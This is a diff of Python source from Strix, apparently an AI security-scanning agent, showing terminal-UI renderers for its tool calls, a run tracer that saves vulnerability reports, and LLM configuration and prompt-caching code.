content_text = f"{header}\n [dim]All requests[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class ViewRequestRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "view_request"
css_classes: ClassVar[list[str]] = ["tool-call", "proxy-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
result = tool_data.get("result")
part = args.get("part", "request")
header = f"👀 [bold #06b6d4]Viewing {part}[/]"
if result and isinstance(result, dict):
if "content" in result:
content = result["content"]
content_preview = content[:500] + "..." if len(content) > 500 else content
content_text = f"{header}\n [dim]{cls.escape_markup(content_preview)}[/]"
elif "matches" in result:
matches = result["matches"]
if isinstance(matches, list) and matches:
match_lines = [
match["match"]
for match in matches[:3]
if isinstance(match, dict) and "match" in match
]
if len(matches) > 3:
match_lines.append(f"... +{len(matches) - 3} more matches")
escaped_lines = [cls.escape_markup(line) for line in match_lines]
content_text = f"{header}\n [dim]{chr(10).join(escaped_lines)}[/]"
else:
content_text = f"{header}\n [dim]No matches found[/]"
else:
content_text = f"{header}\n [dim]Viewing content...[/]"
else:
content_text = f"{header}\n [dim]Loading...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class SendRequestRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "send_request"
css_classes: ClassVar[list[str]] = ["tool-call", "proxy-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
result = tool_data.get("result")
method = args.get("method", "GET")
url = args.get("url", "")
header = f"📤 [bold #06b6d4]Sending {method}[/]"
if result and isinstance(result, dict):
status_code = result.get("status_code")
response_body = result.get("body", "")
if status_code:
response_preview = f"Status: {status_code}"
if response_body:
body_preview = (
response_body[:300] + "..." if len(response_body) > 300 else response_body
)
response_preview += f"\n{body_preview}"
content_text = f"{header}\n [dim]{cls.escape_markup(response_preview)}[/]"
else:
content_text = f"{header}\n [dim]Response received[/]"
elif url:
url_display = url[:400] + "..." if len(url) > 400 else url
content_text = f"{header}\n [dim]{cls.escape_markup(url_display)}[/]"
else:
content_text = f"{header}\n [dim]Sending...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class RepeatRequestRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "repeat_request"
css_classes: ClassVar[list[str]] = ["tool-call", "proxy-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
result = tool_data.get("result")
modifications = args.get("modifications", {})
header = "🔄 [bold #06b6d4]Repeating request[/]"
if result and isinstance(result, dict):
status_code = result.get("status_code")
response_body = result.get("body", "")
if status_code:
response_preview = f"Status: {status_code}"
if response_body:
body_preview = (
response_body[:300] + "..." if len(response_body) > 300 else response_body
)
response_preview += f"\n{body_preview}"
content_text = f"{header}\n [dim]{cls.escape_markup(response_preview)}[/]"
else:
content_text = f"{header}\n [dim]Response received[/]"
elif modifications:
mod_text = str(modifications)
mod_display = mod_text[:400] + "..." if len(mod_text) > 400 else mod_text
content_text = f"{header}\n [dim]{cls.escape_markup(mod_display)}[/]"
else:
content_text = f"{header}\n [dim]No modifications[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class ScopeRulesRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "scope_rules"
css_classes: ClassVar[list[str]] = ["tool-call", "proxy-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static: # noqa: ARG003
header = "⚙️ [bold #06b6d4]Updating proxy scope[/]"
content_text = f"{header}\n [dim]Configuring...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class ListSitemapRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "list_sitemap"
css_classes: ClassVar[list[str]] = ["tool-call", "proxy-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
result = tool_data.get("result")
header = "🗺️ [bold #06b6d4]Listing sitemap[/]"
if result and isinstance(result, dict) and "entries" in result:
entries = result["entries"]
if isinstance(entries, list) and entries:
entry_lines = []
for entry in entries[:4]:
if isinstance(entry, dict):
label = entry.get("label", "?")
kind = entry.get("kind", "?")
line = f"{kind}: {label}"
entry_lines.append(line)
if len(entries) > 4:
entry_lines.append(f"... +{len(entries) - 4} more")
escaped_lines = [cls.escape_markup(line) for line in entry_lines]
content_text = f"{header}\n [dim]{chr(10).join(escaped_lines)}[/]"
else:
content_text = f"{header}\n [dim]No entries found[/]"
else:
content_text = f"{header}\n [dim]Loading...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@register_tool_renderer
class ViewSitemapEntryRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "view_sitemap_entry"
css_classes: ClassVar[list[str]] = ["tool-call", "proxy-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
result = tool_data.get("result")
header = "📍 [bold #06b6d4]Viewing sitemap entry[/]"
if result and isinstance(result, dict):
if "entry" in result:
entry = result["entry"]
if isinstance(entry, dict):
label = entry.get("label", "")
kind = entry.get("kind", "")
if label and kind:
entry_info = f"{kind}: {label}"
content_text = f"{header}\n [dim]{cls.escape_markup(entry_info)}[/]"
else:
content_text = f"{header}\n [dim]Entry details loaded[/]"
else:
content_text = f"{header}\n [dim]Entry details loaded[/]"
else:
content_text = f"{header}\n [dim]Loading entry...[/]"
else:
content_text = f"{header}\n [dim]Loading...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)


@@ -0,0 +1,34 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
from .registry import register_tool_renderer
@register_tool_renderer
class PythonRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "python_action"
css_classes: ClassVar[list[str]] = ["tool-call", "python-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
action = args.get("action", "")
code = args.get("code", "")
header = "</> [bold #3b82f6]Python[/]"
if code and action in ["new_session", "execute"]:
code_display = code[:250] + "..." if len(code) > 250 else code
content_text = f"{header}\n [italic white]{cls.escape_markup(code_display)}[/]"
elif action == "close":
content_text = f"{header}\n [dim]Closing session...[/]"
elif action == "list_sessions":
content_text = f"{header}\n [dim]Listing sessions...[/]"
else:
content_text = f"{header}\n [dim]Running...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)


@@ -0,0 +1,72 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
class ToolTUIRegistry:
_renderers: ClassVar[dict[str, type[BaseToolRenderer]]] = {}
@classmethod
def register(cls, renderer_class: type[BaseToolRenderer]) -> None:
if not renderer_class.tool_name:
raise ValueError(f"Renderer {renderer_class.__name__} must define tool_name")
cls._renderers[renderer_class.tool_name] = renderer_class
@classmethod
def get_renderer(cls, tool_name: str) -> type[BaseToolRenderer] | None:
return cls._renderers.get(tool_name)
@classmethod
def list_tools(cls) -> list[str]:
return list(cls._renderers.keys())
@classmethod
def has_renderer(cls, tool_name: str) -> bool:
return tool_name in cls._renderers
def register_tool_renderer(renderer_class: type[BaseToolRenderer]) -> type[BaseToolRenderer]:
ToolTUIRegistry.register(renderer_class)
return renderer_class
def get_tool_renderer(tool_name: str) -> type[BaseToolRenderer] | None:
return ToolTUIRegistry.get_renderer(tool_name)
def render_tool_widget(tool_data: dict[str, Any]) -> Static:
tool_name = tool_data.get("tool_name", "")
renderer = get_tool_renderer(tool_name)
if renderer:
return renderer.render(tool_data)
return _render_default_tool_widget(tool_data)
def _render_default_tool_widget(tool_data: dict[str, Any]) -> Static:
tool_name = BaseToolRenderer.escape_markup(tool_data.get("tool_name", "Unknown Tool"))
args = tool_data.get("args", {})
status = tool_data.get("status", "unknown")
result = tool_data.get("result")
status_text = BaseToolRenderer.get_status_icon(status)
header = f"→ Using tool [bold blue]{tool_name}[/]"
content_parts = [header]
args_str = BaseToolRenderer.format_args(args)
if args_str:
content_parts.append(args_str)
if status in ["completed", "failed", "error"] and result is not None:
result_str = BaseToolRenderer.format_result(result)
if result_str:
content_parts.append(f"[bold]Result:[/] {result_str}")
else:
content_parts.append(status_text)
css_classes = BaseToolRenderer.get_css_classes(status)
return Static("\n".join(content_parts), classes=css_classes)


@@ -0,0 +1,53 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
from .registry import register_tool_renderer
@register_tool_renderer
class CreateVulnerabilityReportRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "create_vulnerability_report"
css_classes: ClassVar[list[str]] = ["tool-call", "reporting-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
title = args.get("title", "")
severity = args.get("severity", "")
content = args.get("content", "")
header = "🐞 [bold #ea580c]Vulnerability Report[/]"
if title:
content_parts = [f"{header}\n [bold]{cls.escape_markup(title)}[/]"]
if severity:
severity_color = cls._get_severity_color(severity.lower())
content_parts.append(
f" [dim]Severity: [{severity_color}]{severity.upper()}[/{severity_color}][/]"
)
if content:
content_preview = content[:100] + "..." if len(content) > 100 else content
content_parts.append(f" [dim]{cls.escape_markup(content_preview)}[/]")
content_text = "\n".join(content_parts)
else:
content_text = f"{header}\n [dim]Creating report...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)
@classmethod
def _get_severity_color(cls, severity: str) -> str:
severity_colors = {
"critical": "#dc2626",
"high": "#ea580c",
"medium": "#d97706",
"low": "#65a30d",
"info": "#0284c7",
}
return severity_colors.get(severity, "#6b7280")


@@ -0,0 +1,58 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
from .registry import register_tool_renderer
@register_tool_renderer
class ScanStartInfoRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "scan_start_info"
css_classes: ClassVar[list[str]] = ["tool-call", "scan-info-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
status = tool_data.get("status", "unknown")
target = args.get("target", {})
target_display = cls._build_target_display(target)
content = f"🚀 Starting scan on {target_display}"
css_classes = cls.get_css_classes(status)
return Static(content, classes=css_classes)
@classmethod
def _build_target_display(cls, target: dict[str, Any]) -> str:
if target_url := target.get("target_url"):
return f"[bold #22c55e]{target_url}[/bold #22c55e]"
if target_repo := target.get("target_repo"):
return f"[bold #22c55e]{target_repo}[/bold #22c55e]"
if target_path := target.get("target_path"):
return f"[bold #22c55e]{target_path}[/bold #22c55e]"
return "[dim]unknown target[/dim]"
@register_tool_renderer
class SubagentStartInfoRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "subagent_start_info"
css_classes: ClassVar[list[str]] = ["tool-call", "subagent-info-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
status = tool_data.get("status", "unknown")
name = args.get("name", "Unknown Agent")
task = args.get("task", "")
content = f"🤖 Spawned subagent [bold #22c55e]{name}[/bold #22c55e]"
if task:
display_task = task[:80] + "..." if len(task) > 80 else task
content += f"\n Task: [dim]{display_task}[/dim]"
css_classes = cls.get_css_classes(status)
return Static(content, classes=css_classes)


@@ -0,0 +1,99 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
from .registry import register_tool_renderer
@register_tool_renderer
class TerminalRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "terminal_action"
css_classes: ClassVar[list[str]] = ["tool-call", "terminal-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
status = tool_data.get("status", "unknown")
result = tool_data.get("result", {})
action = args.get("action", "unknown")
inputs = args.get("inputs", [])
terminal_id = args.get("terminal_id", "default")
content = cls._build_sleek_content(action, inputs, terminal_id, result)
css_classes = cls.get_css_classes(status)
return Static(content, classes=css_classes)
@classmethod
def _build_sleek_content(
cls,
action: str,
inputs: list[str],
terminal_id: str, # noqa: ARG003
result: dict[str, Any], # noqa: ARG003
) -> str:
terminal_icon = ">_"
if action in {"create", "new_terminal"}:
command = cls._format_command(inputs) if inputs else "bash"
return f"{terminal_icon} [#22c55e]${command}[/]"
if action == "send_input":
command = cls._format_command(inputs)
return f"{terminal_icon} [#22c55e]${command}[/]"
if action == "wait":
return f"{terminal_icon} [dim]waiting...[/]"
if action == "close":
return f"{terminal_icon} [dim]close[/]"
if action == "get_snapshot":
return f"{terminal_icon} [dim]snapshot[/]"
return f"{terminal_icon} [dim]{action}[/]"
@classmethod
def _format_command(cls, inputs: list[str]) -> str:
if not inputs:
return ""
command_parts = []
for input_item in inputs:
if input_item == "Enter":
break
if input_item.startswith("literal:"):
command_parts.append(input_item[8:])
elif input_item in [
"Space",
"Tab",
"Backspace",
"Up",
"Down",
"Left",
"Right",
"Home",
"End",
"PageUp",
"PageDown",
"Insert",
"Delete",
"Escape",
] or input_item.startswith(("^", "C-", "S-", "A-", "F")):
if input_item == "Space":
command_parts.append(" ")
elif input_item == "Tab":
command_parts.append("\t")
continue
else:
command_parts.append(input_item)
command = "".join(command_parts).strip()
if len(command) > 200:
command = command[:197] + "..."
return cls.escape_markup(command) if command else "bash"
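The input-to-command translation in `_format_command` can be exercised on its own. This is a minimal standalone copy of the rule (stop at `Enter`, unwrap `literal:` payloads, map `Space`/`Tab`, drop other control keys), with the markup escaping and `TerminalRenderer` plumbing omitted:

```python
SPECIAL_KEYS = {
    "Backspace", "Up", "Down", "Left", "Right", "Home", "End",
    "PageUp", "PageDown", "Insert", "Delete", "Escape",
}


def format_command(inputs: list[str]) -> str:
    parts: list[str] = []
    for item in inputs:
        if item == "Enter":
            break  # everything after Enter belongs to the next command
        if item.startswith("literal:"):
            parts.append(item[len("literal:"):])
        elif item == "Space":
            parts.append(" ")
        elif item == "Tab":
            parts.append("\t")
        elif item in SPECIAL_KEYS or item.startswith(("^", "C-", "S-", "A-", "F")):
            # Other control chords (Ctrl/Shift/Alt prefixes, function keys
            # such as F1) contribute nothing to the displayed command.
            continue
        else:
            parts.append(item)
    return "".join(parts).strip()
```

Note that the `"F"` prefix check, mirrored from the original, also matches any bare word beginning with `F`; commands should arrive as `literal:`-prefixed inputs to avoid that.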


@@ -0,0 +1,29 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
from .registry import register_tool_renderer
@register_tool_renderer
class ThinkRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "think"
css_classes: ClassVar[list[str]] = ["tool-call", "thinking-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
thought = args.get("thought", "")
header = "🧠 [bold #a855f7]Thinking[/]"
if thought:
thought_display = thought[:200] + "..." if len(thought) > 200 else thought
content = f"{header}\n [italic dim]{cls.escape_markup(thought_display)}[/]"
else:
content = f"{header}\n [italic dim]Thinking...[/]"
css_classes = cls.get_css_classes("completed")
return Static(content, classes=css_classes)


@@ -0,0 +1,43 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
from .registry import register_tool_renderer
@register_tool_renderer
class UserMessageRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "user_message"
css_classes: ClassVar[list[str]] = ["chat-message", "user-message"]
@classmethod
def render(cls, message_data: dict[str, Any]) -> Static:
content = message_data.get("content", "")
if not content:
return Static("", classes=cls.css_classes)
if len(content) > 300:
content = content[:297] + "..."
lines = content.split("\n")
bordered_lines = [f"[#3b82f6]▍[/#3b82f6] {line}" for line in lines]
bordered_content = "\n".join(bordered_lines)
formatted_content = f"[#3b82f6]▍[/#3b82f6] [bold]You:[/]\n{bordered_content}"
css_classes = " ".join(cls.css_classes)
return Static(formatted_content, classes=css_classes)
@classmethod
def render_simple(cls, content: str) -> str:
if not content:
return ""
if len(content) > 300:
content = content[:297] + "..."
lines = content.split("\n")
bordered_lines = [f"[#3b82f6]▍[/#3b82f6] {line}" for line in lines]
bordered_content = "\n".join(bordered_lines)
return f"[#3b82f6]▍[/#3b82f6] [bold]You:[/]\n{bordered_content}"
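`render_simple` reduces to a truncate-then-border transform. A standalone sketch with the Rich markup tags stripped so the shape of the output is visible:

```python
def render_simple(content: str, limit: int = 300) -> str:
    if not content:
        return ""
    # Truncate long messages, reserving three characters for the ellipsis.
    if len(content) > limit:
        content = content[:limit - 3] + "..."
    # Prefix every line with the vertical border marker.
    bordered = "\n".join(f"▍ {line}" for line in content.split("\n"))
    return f"▍ You:\n{bordered}"
```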


@@ -0,0 +1,28 @@
from typing import Any, ClassVar
from textual.widgets import Static
from .base_renderer import BaseToolRenderer
from .registry import register_tool_renderer
@register_tool_renderer
class WebSearchRenderer(BaseToolRenderer):
tool_name: ClassVar[str] = "web_search"
css_classes: ClassVar[list[str]] = ["tool-call", "web-search-tool"]
@classmethod
def render(cls, tool_data: dict[str, Any]) -> Static:
args = tool_data.get("args", {})
query = args.get("query", "")
header = "🌐 [bold #60a5fa]Searching the web...[/]"
if query:
query_display = query[:100] + "..." if len(query) > 100 else query
content_text = f"{header}\n [dim]{cls.escape_markup(query_display)}[/]"
else:
content_text = header
css_classes = cls.get_css_classes("completed")
return Static(content_text, classes=css_classes)

strix/cli/tracer.py Normal file

@@ -0,0 +1,308 @@
import logging
from datetime import UTC, datetime
from pathlib import Path
from typing import Any, Optional
from uuid import uuid4
logger = logging.getLogger(__name__)
_global_tracer: Optional["Tracer"] = None
def get_global_tracer() -> Optional["Tracer"]:
return _global_tracer
def set_global_tracer(tracer: "Tracer") -> None:
global _global_tracer # noqa: PLW0603
_global_tracer = tracer
class Tracer:
def __init__(self, run_name: str | None = None):
self.run_name = run_name
self.run_id = run_name or f"run-{uuid4().hex[:8]}"
self.start_time = datetime.now(UTC).isoformat()
self.end_time: str | None = None
self.agents: dict[str, dict[str, Any]] = {}
self.tool_executions: dict[int, dict[str, Any]] = {}
self.chat_messages: list[dict[str, Any]] = []
self.vulnerability_reports: list[dict[str, Any]] = []
self.final_scan_result: str | None = None
self.scan_results: dict[str, Any] | None = None
self.scan_config: dict[str, Any] | None = None
self.run_metadata: dict[str, Any] = {
"run_id": self.run_id,
"run_name": self.run_name,
"start_time": self.start_time,
"end_time": None,
"target": None,
"scan_type": None,
"status": "running",
}
self._run_dir: Path | None = None
self._next_execution_id = 1
self._next_message_id = 1
def set_run_name(self, run_name: str) -> None:
self.run_name = run_name
self.run_id = run_name
def get_run_dir(self) -> Path:
if self._run_dir is None:
workspace_root = Path(__file__).parent.parent.parent
runs_dir = workspace_root / "agent_runs"
runs_dir.mkdir(exist_ok=True)
run_dir_name = self.run_name if self.run_name else self.run_id
self._run_dir = runs_dir / run_dir_name
self._run_dir.mkdir(exist_ok=True)
return self._run_dir
def add_vulnerability_report(
self,
title: str,
content: str,
severity: str,
) -> str:
report_id = f"vuln-{len(self.vulnerability_reports) + 1:04d}"
report = {
"id": report_id,
"title": title.strip(),
"content": content.strip(),
"severity": severity.lower().strip(),
"timestamp": datetime.now(UTC).strftime("%Y-%m-%d %H:%M:%S UTC"),
}
self.vulnerability_reports.append(report)
logger.info(f"Added vulnerability report: {report_id} - {title}")
return report_id
def set_final_scan_result(
self,
content: str,
success: bool = True,
) -> None:
self.final_scan_result = content.strip()
self.scan_results = {
"scan_completed": True,
"content": content,
"success": success,
}
logger.info(f"Set final scan result: success={success}")
def log_agent_creation(
self, agent_id: str, name: str, task: str, parent_id: str | None = None
) -> None:
agent_data: dict[str, Any] = {
"id": agent_id,
"name": name,
"task": task,
"status": "running",
"parent_id": parent_id,
"created_at": datetime.now(UTC).isoformat(),
"updated_at": datetime.now(UTC).isoformat(),
"tool_executions": [],
}
self.agents[agent_id] = agent_data
def log_chat_message(
self,
content: str,
role: str,
agent_id: str | None = None,
metadata: dict[str, Any] | None = None,
) -> int:
message_id = self._next_message_id
self._next_message_id += 1
message_data = {
"message_id": message_id,
"content": content,
"role": role,
"agent_id": agent_id,
"timestamp": datetime.now(UTC).isoformat(),
"metadata": metadata or {},
}
self.chat_messages.append(message_data)
return message_id
def log_tool_execution_start(self, agent_id: str, tool_name: str, args: dict[str, Any]) -> int:
execution_id = self._next_execution_id
self._next_execution_id += 1
now = datetime.now(UTC).isoformat()
execution_data = {
"execution_id": execution_id,
"agent_id": agent_id,
"tool_name": tool_name,
"args": args,
"status": "running",
"result": None,
"timestamp": now,
"started_at": now,
"completed_at": None,
}
self.tool_executions[execution_id] = execution_data
if agent_id in self.agents:
self.agents[agent_id]["tool_executions"].append(execution_id)
return execution_id
def update_tool_execution(
self, execution_id: int, status: str, result: Any | None = None
) -> None:
if execution_id in self.tool_executions:
self.tool_executions[execution_id]["status"] = status
self.tool_executions[execution_id]["result"] = result
self.tool_executions[execution_id]["completed_at"] = datetime.now(UTC).isoformat()
def update_agent_status(self, agent_id: str, status: str) -> None:
if agent_id in self.agents:
self.agents[agent_id]["status"] = status
self.agents[agent_id]["updated_at"] = datetime.now(UTC).isoformat()
def set_scan_config(self, config: dict[str, Any]) -> None:
self.scan_config = config
self.run_metadata.update(
{
"target": config.get("target", {}),
"scan_type": config.get("scan_type", "general"),
"user_instructions": config.get("user_instructions", ""),
"max_iterations": config.get("max_iterations", 200),
}
)
def save_run_data(self) -> None:
try:
run_dir = self.get_run_dir()
self.end_time = datetime.now(UTC).isoformat()
if self.final_scan_result:
scan_report_file = run_dir / "scan_report.md"
with scan_report_file.open("w", encoding="utf-8") as f:
f.write("# Security Scan Report\n\n")
f.write(
f"**Generated:** {datetime.now(UTC).strftime('%Y-%m-%d %H:%M:%S UTC')}\n\n"
)
f.write(f"{self.final_scan_result}\n")
logger.info(f"Saved final scan report to: {scan_report_file}")
if self.vulnerability_reports:
vuln_dir = run_dir / "vulnerabilities"
vuln_dir.mkdir(exist_ok=True)
severity_order = {"critical": 0, "high": 1, "medium": 2, "low": 3, "info": 4}
sorted_reports = sorted(
self.vulnerability_reports,
key=lambda x: (severity_order.get(x["severity"], 5), x["timestamp"]),
)
for report in sorted_reports:
vuln_file = vuln_dir / f"{report['id']}.md"
with vuln_file.open("w", encoding="utf-8") as f:
f.write(f"# {report['title']}\n\n")
f.write(f"**ID:** {report['id']}\n")
f.write(f"**Severity:** {report['severity'].upper()}\n")
f.write(f"**Found:** {report['timestamp']}\n\n")
f.write("## Description\n\n")
f.write(f"{report['content']}\n")
import csv
vuln_csv_file = run_dir / "vulnerabilities.csv"
with vuln_csv_file.open("w", encoding="utf-8", newline="") as f:
fieldnames = ["id", "title", "severity", "timestamp", "file"]
writer = csv.DictWriter(f, fieldnames=fieldnames)
writer.writeheader()
for report in sorted_reports:
writer.writerow(
{
"id": report["id"],
"title": report["title"],
"severity": report["severity"].upper(),
"timestamp": report["timestamp"],
"file": f"vulnerabilities/{report['id']}.md",
}
)
logger.info(
f"Saved {len(self.vulnerability_reports)} vulnerability reports to: {vuln_dir}"
)
logger.info(f"Saved vulnerability index to: {vuln_csv_file}")
logger.info(f"📊 Essential scan data saved to: {run_dir}")
except (OSError, RuntimeError):
logger.exception("Failed to save scan data")
def _calculate_duration(self) -> float:
try:
start = datetime.fromisoformat(self.start_time.replace("Z", "+00:00"))
if self.end_time:
end = datetime.fromisoformat(self.end_time.replace("Z", "+00:00"))
return (end - start).total_seconds()
except (ValueError, TypeError):
pass
return 0.0
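`_calculate_duration` is plain ISO-8601 arithmetic. The happy path in isolation; the `"Z"` replacement keeps tolerance for `Z`-suffixed timestamps, which `datetime.fromisoformat` rejects before Python 3.11:

```python
from datetime import datetime


def duration_seconds(start_iso: str, end_iso: str) -> float:
    # Normalize a trailing "Z" to an explicit UTC offset, then subtract.
    start = datetime.fromisoformat(start_iso.replace("Z", "+00:00"))
    end = datetime.fromisoformat(end_iso.replace("Z", "+00:00"))
    return (end - start).total_seconds()
```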
def get_agent_tools(self, agent_id: str) -> list[dict[str, Any]]:
return [
exec_data
for exec_data in self.tool_executions.values()
if exec_data.get("agent_id") == agent_id
]
def get_real_tool_count(self) -> int:
return sum(
1
for exec_data in self.tool_executions.values()
if exec_data.get("tool_name") not in ["scan_start_info", "subagent_start_info"]
)
def get_total_llm_stats(self) -> dict[str, Any]:
from strix.tools.agents_graph.agents_graph_actions import _agent_instances
total_stats = {
"input_tokens": 0,
"output_tokens": 0,
"cached_tokens": 0,
"cache_creation_tokens": 0,
"cost": 0.0,
"requests": 0,
"failed_requests": 0,
}
for agent_instance in _agent_instances.values():
if hasattr(agent_instance, "llm") and hasattr(agent_instance.llm, "_total_stats"):
agent_stats = agent_instance.llm._total_stats
total_stats["input_tokens"] += agent_stats.input_tokens
total_stats["output_tokens"] += agent_stats.output_tokens
total_stats["cached_tokens"] += agent_stats.cached_tokens
total_stats["cache_creation_tokens"] += agent_stats.cache_creation_tokens
total_stats["cost"] += agent_stats.cost
total_stats["requests"] += agent_stats.requests
total_stats["failed_requests"] += agent_stats.failed_requests
total_stats["cost"] = round(total_stats["cost"], 4)
return {
"total": total_stats,
"total_tokens": total_stats["input_tokens"] + total_stats["output_tokens"],
}
def cleanup(self) -> None:
self.save_run_data()

strix/llm/__init__.py Normal file

@@ -0,0 +1,12 @@
import litellm
from .config import LLMConfig
from .llm import LLM
__all__ = [
"LLM",
"LLMConfig",
]
litellm.drop_params = True

strix/llm/config.py Normal file

@@ -0,0 +1,19 @@
import os
class LLMConfig:
def __init__(
self,
model_name: str | None = None,
temperature: float = 0,
enable_prompt_caching: bool = True,
prompt_modules: list[str] | None = None,
):
self.model_name = model_name or os.getenv("STRIX_LLM", "anthropic/claude-sonnet-4-20250514")
if not self.model_name:
raise ValueError("STRIX_LLM environment variable must be set and not empty")
self.temperature = max(0.0, min(1.0, temperature))
self.enable_prompt_caching = enable_prompt_caching
self.prompt_modules = prompt_modules or []

strix/llm/llm.py Normal file

@@ -0,0 +1,310 @@
import logging
import os
from dataclasses import dataclass
from enum import Enum
from pathlib import Path
from typing import Any
import litellm
from jinja2 import (
Environment,
FileSystemLoader,
select_autoescape,
)
from litellm import ModelResponse, completion_cost
from litellm.utils import supports_prompt_caching
from strix.llm.config import LLMConfig
from strix.llm.memory_compressor import MemoryCompressor
from strix.llm.request_queue import get_global_queue
from strix.llm.utils import _truncate_to_first_function, parse_tool_invocations
from strix.prompts import load_prompt_modules
from strix.tools import get_tools_prompt
logger = logging.getLogger(__name__)
api_key = os.getenv("LLM_API_KEY")
if api_key:
litellm.api_key = api_key
class StepRole(str, Enum):
AGENT = "agent"
USER = "user"
SYSTEM = "system"
@dataclass
class LLMResponse:
content: str
tool_invocations: list[dict[str, Any]] | None = None
scan_id: str | None = None
step_number: int = 1
role: StepRole = StepRole.AGENT
@dataclass
class RequestStats:
input_tokens: int = 0
output_tokens: int = 0
cached_tokens: int = 0
cache_creation_tokens: int = 0
cost: float = 0.0
requests: int = 0
failed_requests: int = 0
def to_dict(self) -> dict[str, int | float]:
return {
"input_tokens": self.input_tokens,
"output_tokens": self.output_tokens,
"cached_tokens": self.cached_tokens,
"cache_creation_tokens": self.cache_creation_tokens,
"cost": round(self.cost, 4),
"requests": self.requests,
"failed_requests": self.failed_requests,
}
class LLM:
def __init__(self, config: LLMConfig, agent_name: str | None = None):
self.config = config
self.agent_name = agent_name
self._total_stats = RequestStats()
self._last_request_stats = RequestStats()
self.memory_compressor = MemoryCompressor()
if agent_name:
prompt_dir = Path(__file__).parent.parent / "agents" / agent_name
prompts_dir = Path(__file__).parent.parent / "prompts"
loader = FileSystemLoader([prompt_dir, prompts_dir])
self.jinja_env = Environment(
loader=loader,
autoescape=select_autoescape(enabled_extensions=(), default_for_string=False),
)
try:
prompt_module_content = load_prompt_modules(
self.config.prompt_modules or [], self.jinja_env
)
def get_module(name: str) -> str:
return prompt_module_content.get(name, "")
self.jinja_env.globals["get_module"] = get_module
self.system_prompt = self.jinja_env.get_template("system_prompt.jinja").render(
get_tools_prompt=get_tools_prompt,
loaded_module_names=list(prompt_module_content.keys()),
**prompt_module_content,
)
except (FileNotFoundError, OSError, ValueError) as e:
logger.warning(f"Failed to load system prompt for {agent_name}: {e}")
self.system_prompt = "You are a helpful AI assistant."
else:
self.system_prompt = "You are a helpful AI assistant."
def _add_cache_control_to_content(
self, content: str | list[dict[str, Any]]
) -> str | list[dict[str, Any]]:
if isinstance(content, str):
return [{"type": "text", "text": content, "cache_control": {"type": "ephemeral"}}]
if isinstance(content, list) and content:
last_item = content[-1]
if isinstance(last_item, dict) and last_item.get("type") == "text":
return content[:-1] + [{**last_item, "cache_control": {"type": "ephemeral"}}]
return content
def _is_anthropic_model(self) -> bool:
if not self.config.model_name:
return False
model_lower = self.config.model_name.lower()
return any(provider in model_lower for provider in ["anthropic/", "claude"])
def _calculate_cache_interval(self, total_messages: int) -> int:
if total_messages <= 1:
return 10
max_cached_messages = 3
non_system_messages = total_messages - 1
interval = 10
while non_system_messages // interval > max_cached_messages:
interval += 10
return interval
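`_calculate_cache_interval` widens the sampling interval in steps of 10 until at most three non-system messages would carry cache markers (Anthropic currently allows only a handful of `cache_control` breakpoints per request, and one is spent on the system prompt). The rule in isolation:

```python
def calculate_cache_interval(total_messages: int, max_cached: int = 3) -> int:
    if total_messages <= 1:
        return 10
    non_system = total_messages - 1
    interval = 10
    # Widen until sampling every `interval`-th message yields <= max_cached hits.
    while non_system // interval > max_cached:
        interval += 10
    return interval
```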
def _prepare_cached_messages(self, messages: list[dict[str, Any]]) -> list[dict[str, Any]]:
if (
not self.config.enable_prompt_caching
or not supports_prompt_caching(self.config.model_name)
or not messages
):
return messages
if not self._is_anthropic_model():
return messages
cached_messages = list(messages)
if cached_messages and cached_messages[0].get("role") == "system":
system_message = cached_messages[0].copy()
